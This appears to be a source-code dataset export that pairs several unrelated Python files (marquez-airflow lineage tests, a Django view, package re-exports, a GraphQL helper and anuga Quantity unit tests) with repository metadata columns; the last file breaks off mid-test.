ti1.state = State.FAILED
session.add(ti1)
session.commit()
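# handle_callback() is the hook through which marquez_airflow reports run
# state (see the mark_job_run_* asserts below); calling it directly here
# simulates the scheduler firing the DAG-level callback.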
dag.handle_callback(dagrun, success=True, session=session)
# Assert start run meta calls
start_job_run_calls = [
mock.call(run_id_completed, mock.ANY),
mock.call(run_id_failed, mock.ANY)
]
mock_marquez_client.mark_job_run_as_started.assert_has_calls(
start_job_run_calls
)
mock_marquez_client.mark_job_run_as_completed.assert_called_once_with(
run_id=run_id_completed,
at=mock.ANY
)
# When a task run completes, the task outputs are also updated in order
# to link a job version (=task version) to a dataset version.
# Since a DummyOperator produces no outputs, assert that the create
# dataset call is not invoked.
mock_marquez_client.create_dataset.assert_not_called()
dag.handle_callback(dagrun, success=False, session=session)
mock_marquez_client.mark_job_run_as_failed.assert_called_once_with(
run_id=run_id_failed,
at=mock.ANY
)
# Assert an attempt to version the outputs of a task is not made when
# a task fails
mock_marquez_client.create_dataset.assert_not_called()
class TestFixtureDummyOperator(DummyOperator):
@apply_defaults
def __init__(self, *args, **kwargs):
super(TestFixtureDummyOperator, self).__init__(*args, **kwargs)
class TestFixtureDummyExtractor(BaseExtractor):
operator_class = TestFixtureDummyOperator
source = Source(
type="DummySource",
name="dummy_source_name",
connection_url="http://dummy/source/url")
def __init__(self, operator):
super().__init__(operator)
def extract(self) -> [StepMetadata]:
inputs = [
Dataset.from_table(self.source, "extract_input1")
]
outputs = [
Dataset.from_table(self.source, "extract_output1")
]
return [StepMetadata(
name=get_job_name(task=self.operator),
inputs=inputs,
outputs=outputs,
context={
"extract": "extract"
}
)]
def extract_on_complete(self, task_instance) -> [StepMetadata]:
return []
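# Variant of the fixture extractor above that reports nothing at extract()
# time and defers all metadata extraction to extract_on_complete().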
class TestFixtureDummyExtractorOnComplete(BaseExtractor):
operator_class = TestFixtureDummyOperator
source = Source(
type="DummySource",
name="dummy_source_name",
connection_url="http://dummy/source/url")
def __init__(self, operator):
super().__init__(operator)
def extract(self) -> [StepMetadata]:
return []
def extract_on_complete(self, task_instance) -> [StepMetadata]:
inputs = [
Dataset.from_table_schema(self.source, DbTableSchema(
schema_name='schema',
table_name=DbTableName('extract_on_complete_input1'),
columns=[DbColumn(
name='field1',
type='text',
description='',
ordinal_position=1
),
DbColumn(
name='field2',
type='text',
description='',
ordinal_position=2
)]
))
]
outputs = [
Dataset.from_table(self.source, "extract_on_complete_output1")
]
return [StepMetadata(
name=get_job_name(task=self.operator),
inputs=inputs,
outputs=outputs,
context={
"extract_on_complete": "extract_on_complete"
}
)]
# tests the full lifecycle, including extractors
@mock.patch('marquez_airflow.DAG.new_run_id')
@mock.patch('marquez_airflow.marquez.Marquez.get_or_create_marquez_client')
@provide_session
def test_marquez_dag_with_extractor(mock_get_or_create_marquez_client,
mock_uuid,
clear_db_airflow_dags,
session=None):
# --- test setup
dag_id = 'test_marquez_dag_with_extractor'
dag = DAG(
dag_id,
schedule_interval='@daily',
default_args=DAG_DEFAULT_ARGS,
description=DAG_DESCRIPTION
)
run_id = "my-test-uuid"
mock_uuid.side_effect = [run_id]
# Mock the marquez client method calls
mock_marquez_client = mock.Mock()
mock_get_or_create_marquez_client.return_value = mock_marquez_client
# Add task that will be marked as completed
task_will_complete = TestFixtureDummyOperator(
task_id=TASK_ID_COMPLETED,
dag=dag
)
completed_task_location = get_location(task_will_complete.dag.fileloc)
# Add the dummy extractor to the list for the task above
_DAG_EXTRACTORS[task_will_complete.__class__] = TestFixtureDummyExtractor
# --- pretend run the DAG
# Create DAG run and mark as running
dagrun = dag.create_dagrun(
run_id='test_marquez_dag_with_extractor_run_id',
execution_date=DEFAULT_DATE,
state=State.RUNNING)
# --- Assert that starting the job triggers metadata updates
# Namespace created
mock_marquez_client.create_namespace.assert_called_once_with(DAG_NAMESPACE,
DAG_OWNER)
# Datasets are updated
mock_marquez_client.create_source.assert_called_with(
'dummy_source_name',
'DummySource',
'http://dummy/source/url'
)
mock_marquez_client.create_dataset.assert_has_calls([
mock.call(
dataset_name='extract_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=None
),
mock.call(
dataset_name='extract_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=None
)
])
# job is updated
mock_marquez_client.create_job.assert_called_once_with(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[{'namespace': 'default', 'name': 'extract_input1'}],
output_dataset=[{'namespace': 'default', 'name': 'extract_output1'}],
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id=None
)
assert mock_marquez_client.create_job.mock_calls[0].\
kwargs['context'].get('extract') == 'extract'
# run is created
mock_marquez_client.create_job_run.assert_called_once_with(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
run_id=run_id,
run_args=DAG_RUN_ARGS,
nominal_start_time=mock.ANY,
nominal_end_time=mock.ANY,
namespace_name=DAG_NAMESPACE
)
log.info("Marquez client calls when starting:")
for call in mock_marquez_client.mock_calls:
log.info(call)
assert [name for name, args, kwargs in mock_marquez_client.mock_calls] == [
'create_namespace',
'create_source',
'create_dataset',
'create_source',
'create_dataset',
'create_job',
'create_job_run'
]
mock_marquez_client.reset_mock()
# --- Pretend to complete the task
task_will_complete.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
dag.handle_callback(dagrun, success=True, session=session)
# run is started
mock_marquez_client.mark_job_run_as_started.assert_called_once_with(
run_id, mock.ANY
)
# --- Assert that the right Marquez calls are made
# job is updated before completion
mock_marquez_client.create_job.assert_has_calls([
mock.call(
namespace_name=DAG_NAMESPACE,
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[
{'namespace': 'default', 'name': 'extract_input1'}
],
output_dataset=[
{'namespace': 'default', 'name': 'extract_output1'}
],
context=mock.ANY,
description=DAG_DESCRIPTION,
run_id=run_id
)
])
assert mock_marquez_client.create_job.mock_calls[0].\
kwargs['context'].get('extract') == 'extract'
mock_marquez_client.mark_job_run_as_completed.assert_called_once_with(
run_id=run_id,
at=mock.ANY
)
# When a task run completes, the task outputs are also updated in order
# to link a job version (=task version) to a dataset version.
mock_marquez_client.create_dataset.assert_has_calls([
mock.call(
dataset_name='extract_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=None
),
mock.call(
dataset_name='extract_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=run_id
)
])
log.info("Marquez client calls when completing:")
for call in mock_marquez_client.mock_calls:
log.info(call)
assert [name for name, args, kwargs in mock_marquez_client.mock_calls] == [
'create_namespace',
'create_source',
'create_dataset',
'create_source',
'create_dataset',
'create_job',
'mark_job_run_as_started',
'mark_job_run_as_completed'
]
@mock.patch('marquez_airflow.DAG.new_run_id')
@mock.patch('marquez_airflow.marquez.Marquez.get_or_create_marquez_client')
@provide_session
def test_marquez_dag_with_extract_on_complete(
mock_get_or_create_marquez_client,
mock_uuid,
clear_db_airflow_dags,
session=None):
# --- test setup
dag_id = 'test_marquez_dag_with_extractor'
dag = DAG(
dag_id,
schedule_interval='@daily',
default_args=DAG_DEFAULT_ARGS,
description=DAG_DESCRIPTION
)
run_id = "my-test-uuid"
mock_uuid.side_effect = [run_id]
# Mock the marquez client method calls
mock_marquez_client = mock.Mock()
mock_get_or_create_marquez_client.return_value = mock_marquez_client
# Add task that will be marked as completed
task_will_complete = TestFixtureDummyOperator(
task_id=TASK_ID_COMPLETED,
dag=dag
)
completed_task_location = get_location(task_will_complete.dag.fileloc)
# Add the dummy extractor to the list for the task above
_DAG_EXTRACTORS[task_will_complete.__class__] = \
TestFixtureDummyExtractorOnComplete
# Create DAG run and mark as running
dagrun = dag.create_dagrun(
run_id='test_marquez_dag_with_extractor_run_id',
execution_date=DEFAULT_DATE,
state=State.RUNNING)
# Namespace created
mock_marquez_client.create_namespace.assert_called_once_with(DAG_NAMESPACE,
DAG_OWNER)
log.info("Marquez client calls when starting:")
for call in mock_marquez_client.mock_calls:
log.info(call)
assert [name for name, args, kwargs in mock_marquez_client.mock_calls] == [
'create_namespace'
]
mock_marquez_client.reset_mock()
# --- Pretend to complete the task
task_will_complete.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
dag.handle_callback(dagrun, success=True, session=session)
# Datasets are updated
mock_marquez_client.create_source.assert_called_with(
'dummy_source_name',
'DummySource',
'http://dummy/source/url'
)
# create_dataset is called twice per dataset: once to reenact the
# _begin_run_flow and again at _end_run_flow, with the run id attached
# to the output dataset
mock_marquez_client.create_dataset.assert_has_calls([
mock.call(
dataset_name='schema.extract_on_complete_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='schema.extract_on_complete_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=mock.ANY,
run_id=None
),
mock.call(
dataset_name='extract_on_complete_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_on_complete_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=None
),
mock.call(
dataset_name='schema.extract_on_complete_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='schema.extract_on_complete_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=mock.ANY,
run_id=None
),
mock.call(
dataset_name='extract_on_complete_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_on_complete_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id='my-test-uuid'
)
])
# job is updated
mock_marquez_client.create_job.assert_has_calls([
mock.call(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[{'namespace': 'default',
'name': 'schema.extract_on_complete_input1'}],
output_dataset=[{'namespace': 'default',
'name': 'extract_on_complete_output1'}],
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id=None
),
mock.call(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[{'namespace': 'default',
'name': 'schema.extract_on_complete_input1'}],
output_dataset=[{'namespace': 'default',
'name': 'extract_on_complete_output1'}],
context=mock.ANY,
description=DAG_DESCRIPTION,
namespace_name=DAG_NAMESPACE,
run_id='my-test-uuid'
)
])
assert mock_marquez_client.create_job.mock_calls[0].\
kwargs['context'].get('extract_on_complete') == 'extract_on_complete'
# run is created
mock_marquez_client.create_job_run.assert_called_once_with(
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
run_id=run_id,
run_args=DAG_RUN_ARGS,
nominal_start_time=mock.ANY,
nominal_end_time=mock.ANY,
namespace_name=DAG_NAMESPACE
)
# run is started
mock_marquez_client.mark_job_run_as_started.assert_called_once_with(
run_id, mock.ANY
)
# --- Assert that the right Marquez calls are made
# job is updated before completion
mock_marquez_client.create_job.assert_has_calls([
mock.call(
namespace_name=DAG_NAMESPACE,
job_name=f"{dag_id}.{TASK_ID_COMPLETED}",
job_type=JobType.BATCH,
location=completed_task_location,
input_dataset=[
{'namespace': 'default',
'name': 'schema.extract_on_complete_input1'}
],
output_dataset=[
{'namespace': 'default', 'name': 'extract_on_complete_output1'}
],
context=mock.ANY,
description=DAG_DESCRIPTION,
run_id=run_id
)
])
assert mock_marquez_client.create_job.mock_calls[0].\
kwargs['context'].get('extract_on_complete') == 'extract_on_complete'
mock_marquez_client.mark_job_run_as_completed.assert_called_once_with(
run_id=run_id,
at=mock.ANY
)
# When a task run completes, the task outputs are also updated in order
# to link a job version (=task version) to a dataset version.
mock_marquez_client.create_dataset.assert_has_calls([
mock.call(
dataset_name='schema.extract_on_complete_input1',
dataset_type=DatasetType.DB_TABLE,
physical_name='schema.extract_on_complete_input1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=mock.ANY,
run_id=None
),
mock.call(
dataset_name='extract_on_complete_output1',
dataset_type=DatasetType.DB_TABLE,
physical_name='extract_on_complete_output1',
source_name='dummy_source_name',
namespace_name=DAG_NAMESPACE,
fields=[],
run_id=run_id
)
])
log.info("Marquez client calls when completing:")
for call in mock_marquez_client.mock_calls:
log.info(call)
assert [name for name, args, kwargs in mock_marquez_client.mock_calls] == [
'create_namespace',
'create_source',
'create_dataset',
'create_source',
'create_dataset',
'create_job',
'create_job_run',
'create_source',
'create_dataset',
'create_source',
'create_dataset',
'create_job',
'mark_job_run_as_started',
'mark_job_run_as_completed'
]
| 32.903978
| 79
| 0.646058
| 2,837
| 23,987
| 5.095171
| 0.093761
| 0.059357
| 0.057627
| 0.039779
| 0.796057
| 0.773919
| 0.760567
| 0.746109
| 0.721965
| 0.709028
| 0
| 0.003593
| 0.269062
| 23,987
| 728
| 80
| 32.949176
| 0.820852
| 0.109643
| 0
| 0.715789
| 0
| 0
| 0.156787
| 0.072194
| 0
| 0
| 0
| 0.001374
| 0.064912
| 1
| 0.021053
| false
| 0
| 0.029825
| 0.003509
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
310461f740761fe3fece24641e0162474574c110
| 131
|
py
|
Python
|
tests/auth_example/auth_example/views.py
|
KitchenStories/django-rest-swagger
|
4262cb5156285adcdf661d5204d45eefd269aaca
|
[
"BSD-2-Clause"
] | 1
|
2021-02-17T13:11:41.000Z
|
2021-02-17T13:11:41.000Z
|
tests/auth_example/auth_example/views.py
|
KitchenStories/django-rest-swagger
|
4262cb5156285adcdf661d5204d45eefd269aaca
|
[
"BSD-2-Clause"
] | 9
|
2020-06-05T17:07:13.000Z
|
2022-01-13T00:36:30.000Z
|
tests/auth_example/auth_example/views.py
|
KitchenStories/django-rest-swagger
|
4262cb5156285adcdf661d5204d45eefd269aaca
|
[
"BSD-2-Clause"
] | 1
|
2021-02-18T11:05:55.000Z
|
2021-02-18T11:05:55.000Z
|
from django.http import HttpResponse
def permission_denied_handler(request):
return HttpResponse("you have no permissions!")
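# Hypothetical wiring, assuming django-rest-swagger's SWAGGER_SETTINGS key
# (name taken from the project's README, not verified here):
#   SWAGGER_SETTINGS = {
#       'permission_denied_handler': 'auth_example.views.permission_denied_handler',
#   }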
| 21.833333
| 51
| 0.801527
| 16
| 131
| 6.4375
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129771
| 131
| 5
| 52
| 26.2
| 0.903509
| 0
| 0
| 0
| 0
| 0
| 0.183206
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
31266ef63be16cc1934d60293d6b49c4f1d7b820
| 196
|
py
|
Python
|
src/clients/twitter/__init__.py
|
juanitodread/gorrion
|
1f2c16b7402c237dfb4b47f0fa0afeb3bff7bd19
|
[
"Apache-2.0"
] | 1
|
2020-09-18T17:53:03.000Z
|
2020-09-18T17:53:03.000Z
|
src/clients/twitter/__init__.py
|
juanitodread/gorrion
|
1f2c16b7402c237dfb4b47f0fa0afeb3bff7bd19
|
[
"Apache-2.0"
] | 6
|
2020-10-27T03:31:41.000Z
|
2021-09-16T18:58:44.000Z
|
src/clients/twitter/__init__.py
|
juanitodread/gorrion
|
1f2c16b7402c237dfb4b47f0fa0afeb3bff7bd19
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
from src.clients.twitter.client import (
Twitter,
TwitterLocal,
)
from src.clients.twitter.models import PublishedTweet
from src.clients.twitter.config import TwitterConfig
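# Package facade: re-exporting these names lets callers write, e.g.,
# `from src.clients.twitter import Twitter, PublishedTweet, TwitterConfig`.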
| 24.5
| 53
| 0.790816
| 24
| 196
| 6.458333
| 0.541667
| 0.135484
| 0.270968
| 0.406452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005882
| 0.132653
| 196
| 7
| 54
| 28
| 0.905882
| 0.061224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
313519530f3b7fd1e6f86640611dcd6119ce7085
| 37
|
py
|
Python
|
discord/webhook/async_.py
|
Harukomaze/disnake
|
541f5c9623a02be894cd1015dbb344070700cb87
|
[
"MIT"
] | null | null | null |
discord/webhook/async_.py
|
Harukomaze/disnake
|
541f5c9623a02be894cd1015dbb344070700cb87
|
[
"MIT"
] | null | null | null |
discord/webhook/async_.py
|
Harukomaze/disnake
|
541f5c9623a02be894cd1015dbb344070700cb87
|
[
"MIT"
] | null | null | null |
from disnake.webhook.async_ import *
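# Compatibility shim: re-exports disnake's async webhook implementation
# under the discord.webhook.async_ module path.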
| 18.5
| 36
| 0.810811
| 5
| 37
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.878788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
316b29aee0c5c22612f6454966a5b61d32abe8f1
| 427
|
py
|
Python
|
whatnot/utils.py
|
willmeyers/unofficial-whatnot-api
|
b7b0792b77824a38b61f45c0e01f346673566a78
|
[
"MIT"
] | null | null | null |
whatnot/utils.py
|
willmeyers/unofficial-whatnot-api
|
b7b0792b77824a38b61f45c0e01f346673566a78
|
[
"MIT"
] | null | null | null |
whatnot/utils.py
|
willmeyers/unofficial-whatnot-api
|
b7b0792b77824a38b61f45c0e01f346673566a78
|
[
"MIT"
] | 1
|
2021-06-09T22:44:03.000Z
|
2021-06-09T22:44:03.000Z
|
import requests
BASE_URL = 'https://api.whatnot.com/graphql/'
def query(query, variables):
resp = requests.post(BASE_URL,
params=variables,
data={
'query': query
}
)
return resp.json()
def send_mutation(query, variables):
resp = requests.post(BASE_URL,
params=variables,
data={
'query': query
}
)
return resp.json()
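# Example usage (hypothetical GraphQL document; the real whatnot schema is
# not shown here):
#   result = query('query { me { id username } }', {})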
| 15.814815
| 45
| 0.543326
| 46
| 427
| 4.956522
| 0.456522
| 0.092105
| 0.157895
| 0.219298
| 0.701754
| 0.701754
| 0.701754
| 0.701754
| 0.701754
| 0.701754
| 0
| 0
| 0.320843
| 427
| 26
| 46
| 16.423077
| 0.786207
| 0
| 0
| 0.555556
| 0
| 0
| 0.145199
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.055556
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3170941d662209873a4cdb4b02e25a9b3b97f34c
| 104,484
|
py
|
Python
|
anuga/abstract_2d_finite_volumes/tests/test_quantity.py
|
samcom12/anuga_core
|
f4378114dbf02d666fe6423de45798add5c42806
|
[
"Python-2.0",
"OLDAP-2.7"
] | null | null | null |
anuga/abstract_2d_finite_volumes/tests/test_quantity.py
|
samcom12/anuga_core
|
f4378114dbf02d666fe6423de45798add5c42806
|
[
"Python-2.0",
"OLDAP-2.7"
] | null | null | null |
anuga/abstract_2d_finite_volumes/tests/test_quantity.py
|
samcom12/anuga_core
|
f4378114dbf02d666fe6423de45798add5c42806
|
[
"Python-2.0",
"OLDAP-2.7"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import map
from builtins import str
from builtins import range
from past.utils import old_div
import unittest
from math import sqrt, pi
import tempfile
from anuga.abstract_2d_finite_volumes.quantity import *
from anuga.file_conversion.asc2dem import asc2dem
from anuga.config import epsilon
from anuga.fit_interpolate.fit import fit_to_mesh
#from anuga.pyvolution.least_squares import fit_to_mesh
from anuga.abstract_2d_finite_volumes.generic_domain \
import Generic_Domain
from anuga.geospatial_data.geospatial_data import Geospatial_data
from anuga.coordinate_transforms.geo_reference import Geo_reference
from anuga.geometry.polygon import *
import numpy as num
import pprint
# Auxiliary linear function f(x, y) = x + 3*y, used as ground truth in the
# fit_interpolate.fit examples below
def linear_function(point):
point = num.array(point)
return point[:, 0]+3*point[:, 1]
#return point[:,1]
def axes2points(x, y):
"""Generate all combinations of grid point coordinates from x and y axes
Args:
* x: x coordinates (array)
* y: y coordinates (array)
Returns:
* P: Nx2 array consisting of coordinates for all
grid points defined by x and y axes. The x coordinate
will vary the fastest to match the way 2D numpy
arrays are laid out by default ('C' order). That way,
the x and y coordinates will match a corresponding
2D array A when flattened (A.flat[:] or A.reshape(-1))
Note:
y is reversed internally (flipud), so rows start at the largest y.
Example
x = [1, 2, 3]
y = [10, 20]
P = [[1, 20],
[2, 20],
[3, 20],
[1, 10],
[2, 10],
[3, 10]]
"""
import numpy
# Reverse y coordinates to have them start at bottom of array
y = numpy.flipud(y)
# Repeat x coordinates for each y (fastest varying)
X = numpy.kron(numpy.ones(len(y)), x)
# Repeat y coordinates for each x (slowest varying)
Y = numpy.kron(y, numpy.ones(len(x)))
# Check
N = len(X)
assert len(Y) == N
# Create Nx2 array of x and y coordinates
X = numpy.reshape(X, (N, 1))
Y = numpy.reshape(Y, (N, 1))
P = numpy.concatenate((X, Y), axis=1)
# Return
return P
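# The kron calls above tile x across each y (x varies fastest) and repeat
# each y across the width of x, giving the row-major grid layout described
# in the docstring.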
class Test_Quantity(unittest.TestCase):
def setUp(self):
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
elements = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
self.mesh1 = Generic_Domain(points[:3], [elements[0]])
self.mesh1.check_integrity()
#print self.mesh1.__class__
#print isinstance(self.mesh1, Domain)
self.mesh4 = Generic_Domain(points, elements)
self.mesh4.check_integrity()
# UTM around Onslow
a = [240000, 7620000]
b = [240000, 7680000]
c = [300000, 7620000]
points = [a, b, c]
elements = [[0, 2, 1]]
self.mesh_onslow = Generic_Domain(points, elements)
self.mesh_onslow.check_integrity()
def tearDown(self):
pass
#print " Tearing down"
def test_creation(self):
quantity = Quantity(self.mesh1, [[1, 2, 3]])
assert num.allclose(quantity.vertex_values, [[1., 2., 3.]])
try:
quantity = Quantity()
except:
pass
else:
raise Exception('Should have raised empty quantity exception')
# FIXME(Ole): Temporarily disabled 18 Jan 2009
#try:
# quantity = Quantity([1,2,3])
#except AssertionError:
# pass
#except:
# raise Exception('Should have raised "missing mesh object" error')
def test_creation_zeros(self):
quantity = Quantity(self.mesh1)
assert num.allclose(quantity.vertex_values, [[0., 0., 0.]])
quantity = Quantity(self.mesh4)
assert num.allclose(quantity.vertex_values, [[0., 0., 0.], [0., 0., 0.],
[0., 0., 0.], [0., 0., 0.]])
def test_set_boundary_values(self):
quantity = Quantity(self.mesh1)
quantity.set_boundary_values()
assert num.allclose(quantity.boundary_values, [0.0, 0.0, 0.0])
def test_set_boundary_values_with_function(self):
quantity = Quantity(self.mesh1)
#assert num.allclose(quantity.vertex_values, [[0.,0.,0.]])
def simple(x, y):
return x+3*y
quantity.set_boundary_values(simple)
assert num.allclose(quantity.boundary_values, [1.0, 4.0, 3.0])
def test_set_boundary_values_with_constant(self):
quantity = Quantity(self.mesh1)
#assert num.allclose(quantity.vertex_values, [[0.,0.,0.]])
quantity.set_boundary_values(10.0)
assert num.allclose(quantity.boundary_values, [10.0, 10.0, 10.0])
def test_set_boundary_values_with_array(self):
quantity = Quantity(self.mesh1)
#assert num.allclose(quantity.vertex_values, [[0.,0.,0.]])
quantity.set_boundary_values([10.0, 4.0, 5.0])
assert num.allclose(quantity.boundary_values, [10.0, 4.0, 5.0])
def test_set_boundary_values_with_wrong_sized_array(self):
quantity = Quantity(self.mesh1)
#assert num.allclose(quantity.vertex_values, [[0.,0.,0.]])
try:
quantity.set_boundary_values([10.0, 4.0, 5.0, 8.0])
except:
pass
else:
msg = 'Should have caught this'
raise Exception(msg)
def test_set_boundary_values_from_edges(self):
quantity = Quantity(self.mesh4)
def simple(x, y):
return x+3*y
quantity.set_values(simple)
assert num.allclose(quantity.boundary_values, [
0., 0., 0., 0., 0., 0.])
quantity.set_boundary_values_from_edges()
assert num.allclose(quantity.boundary_values, [
1., 3., 3., 6., 10., 9.])
def test_interpolation(self):
quantity = Quantity(self.mesh1, [[1, 2, 3]])
assert num.allclose(quantity.centroid_values, [2.0]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5]])
def test_interpolation2(self):
quantity = Quantity(self.mesh4,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
quantity.extrapolate_second_order()
#print quantity.vertex_values
assert num.allclose(quantity.vertex_values, [[3.5, -1.0, 3.5],
[3.+2./3, 6.+2./3, 4.+2./3],
[4.6, 3.4, 1.],
[-5.0, 1.0, 4.0]])
#print quantity.edge_values
assert num.allclose(quantity.edge_values, [[1.25, 3.5, 1.25],
[5. + 2/3.0, 4.0
+ 1.0/6, 5.0 + 1.0/6],
[2.2, 2.8, 4.0],
[2.5, -0.5, -2.0]])
def test_save_to_array(self):
quantity = Quantity(self.mesh4,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
cellsize = 1.0
x, y, z = quantity.save_to_array(cellsize=cellsize, smooth=False)
#x,y,z = quantity.save_to_array(smooth=False)
from pprint import pprint
#pprint(x)
#pprint(y)
#pprint(z)
x_ex = [0., 1., 2., 3., 4.]
y_ex = [0., 1., 2., 3., 4.]
z_ex = [[2.00000000e+00, 2.50000000e+00, 0.00000000e+00,
4.50000000e+00, 9.00000000e+00],
[1.50000000e+00, 5.00000000e+00, 0.00000000e+00,
4.50000000e+00, -9.99900000e+03],
[3.00000000e+00, 3.00000000e+00, 3.00000000e+00,
-9.99900000e+03, -9.99900000e+03],
[-1.50000000e+00, -1.50000000e+00, -9.99900000e+03,
-9.99900000e+03, -9.99900000e+03],
[-6.00000000e+00, -9.99900000e+03, -9.99900000e+03,
-9.99900000e+03, -9.99900000e+03]]
assert num.allclose(x_ex, x)
assert num.allclose(y_ex, y)
assert num.allclose(z_ex, z)
Plot = False
if Plot:
import pylab
import numpy
#a = numpy.where(a == -9999, numpy.nan, a)
#a = numpy.where(a > 10.0, numpy.nan, a)
#z = z[::-1,:]
print(z)
print(z.shape)
print(x)
print(y)
nrows = z.shape[0]
ncols = z.shape[1]
ratio = float(nrows)/float(ncols)
print(ratio)
#y = numpy.arange(nrows)*cellsize
#x = numpy.arange(ncols)*cellsize
#Setup fig size to correspond to array size
fig = pylab.figure(figsize=(10, 10*ratio))
levels = numpy.arange(-7, 10, 0.1)
CF = pylab.contourf(x, y, z, levels=levels)
CB = pylab.colorbar(CF, shrink=0.8, extend='both')
#CC = pylab.contour(x,y,a, levels=levels)
pylab.show()
x, y, z = quantity.save_to_array(cellsize=cellsize, smooth=True)
x_ex = [0., 1., 2., 3., 4.]
y_ex = [0., 1., 2., 3., 4.]
z_ex = [[2.00000000e+00, 2.33333333e+00, 2.66666667e+00,
5.83333333e+00, 9.00000000e+00],
[2.50000000e+00, 2.83333333e+00, 2.66666667e+00,
5.83333333e+00, -9.99900000e+03],
[3.00000000e+00, 2.83333333e+00, 2.66666667e+00,
-9.99900000e+03, -9.99900000e+03],
[-1.50000000e+00, -1.66666667e+00, -9.99900000e+03,
-9.99900000e+03, -9.99900000e+03],
[-6.00000000e+00, -9.99900000e+03, -9.99900000e+03,
-9.99900000e+03, -9.99900000e+03]]
#pprint(z)
assert num.allclose(x_ex, x)
assert num.allclose(y_ex, y)
assert num.allclose(z_ex, z)
if Plot:
import pylab
import numpy
#a = numpy.where(a == -9999, numpy.nan, a)
#a = numpy.where(a > 10.0, numpy.nan, a)
